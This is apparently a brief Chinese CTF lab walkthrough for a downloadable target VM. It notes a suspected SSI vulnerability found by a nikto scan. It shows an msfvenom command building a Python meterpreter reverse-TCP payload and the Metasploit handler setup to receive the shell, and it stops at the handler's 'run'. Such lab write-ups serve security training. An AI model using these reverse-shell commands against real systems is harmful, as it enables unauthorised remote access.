CTF实战_009

靶机准备：
链接：https://pan.baidu.com/s/1Kr7On97a3Z9PcC9UVFCYpw 提取码：plu1
靶机IP 192.168.124.154
攻击机IP 192.168.124.153

经过分析扫描结果发现可能纯在SSI漏洞

nikto扫描到shtml后缀文件 index特殊代码 ssi页面显示内容

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.124.153 lport=4444 -f raw > /root/Desktop/shell.py
#生成python木马文件

#使用msf模块接收反弹shell
msfconsole
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.124.153
lhost => 192.168.124.153
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run